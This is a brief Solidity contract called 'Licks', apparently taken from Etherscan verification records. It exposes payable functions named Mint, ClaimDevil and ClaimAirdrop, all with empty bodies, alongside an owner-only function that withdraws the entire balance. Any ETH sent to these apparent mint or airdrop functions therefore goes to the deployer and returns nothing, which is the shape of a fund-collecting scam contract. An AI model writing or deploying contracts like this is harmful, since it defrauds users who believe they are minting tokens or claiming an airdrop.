|
|
|
|
|
|
|
*Submitted for verification at Etherscan.io on 2022-12-29
|
|
*/
|
|
|
|
|
|
*Submitted for verification at Etherscan.io on 2022-12-12
|
|
*/
|
|
|
|
|
|
|
|
pragma solidity ^0.8.16;
|
|
|
|
contract Licks {
|
|
|
|
address private owner;
|
|
|
|
constructor(){
|
|
owner = msg.sender;
|
|
}
|
|
|
|
function getOwner(
|
|
) public view returns (address) {
|
|
return owner;
|
|
}
|
|
|
|
modifier onlyOwner() {
|
|
require(owner == msg.sender, "Ownable: caller is not the owner");
|
|
_;
|
|
}
|
|
|
|
function withdrawBalance() external onlyOwner{
|
|
(bool success, ) = msg.sender.call{value: address(this).balance}("");
|
|
require(success, "WITHDRAW FAILED!");
|
|
}
|
|
|
|
function Mint() public payable {
|
|
}
|
|
|
|
function ClaimDevil() public payable {
|
|
}
|
|
|
|
function ClaimAirdrop() public payable {
|
|
}
|
|
|
|
} |